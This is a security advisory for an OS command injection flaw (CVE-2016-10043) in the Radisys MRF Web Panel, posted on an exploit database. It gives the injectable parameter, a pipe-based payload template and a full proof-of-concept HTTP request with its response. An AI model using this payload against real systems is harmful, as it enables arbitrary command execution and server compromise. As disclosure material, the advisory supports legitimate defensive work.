Radisys MRF - Command Injection Vulnerability

2017-01-27T00:00:00
ID 1337DAY-ID-26831
Type zdt
Reporter Filippos Mastrogiannis
Modified 2017-01-27T00:00:00

Description

Exploit for cgi platform in category web applications

                                        
                                            Title:      MRF Web Panel OS Command Injection
Vendor:     Radisys
Vendor Homepage: http://www.radisys.com
Product:    MRF Web Panel (SWMS)
Version:    9.0.1
CVE:        CVE-2016-10043
CWE:        CWE-78
Risk Level: High
 
Discovery:  Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
            COSMOTE (OTE Group) Information & Network Security
 
-----------------------------------------------------------------------------------------
 
 
Vulnerability Details:
 
The MRF Web Panel (SWMS) is vulnerable to OS Command Injection
attacks.
 
> Affected parameter: MSM_MACRO_NAME (POST parameter)
> Affected file: ms.cgi (/swms/ms.cgi)
> Verified Affected Operation: Show Fatal Error and Log Package Configuration
 
It is possible to use the pipe character (|) to inject arbitrary OS commands
and retrieve the output in the application's responses:
 
MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
 
 
Proof Of Concept:
 
1. Login to the vulnerable MRF web panel (with a standard user account): 
   https://<vulnerable>/swms
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc)
3. Modify and send the following POST request:
 
POST /swms/ms.cgi HTTP/1.1
Host: <vulnerable>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
 
MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
 
4. Check the output of the injected command 'pwd' in the response:
 
HTTP/1.1 200 OK
Date: Thu, 21 Jul 2016 08:18:43 GMT
Server: Apache
Cache-Control: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23
 
/var/opt/swms/www/html
 
 
Vulnerability Impact:
 
Application's own data and functionality or the web server can be compromised due
to OS command injection vulnerabilities. It may also be possible to use the server
as a platform for attacks against other systems.
 
 
Disclaimer:
 
The responsible disclosure policy has been followed

#  0day.today [2018-03-31]  #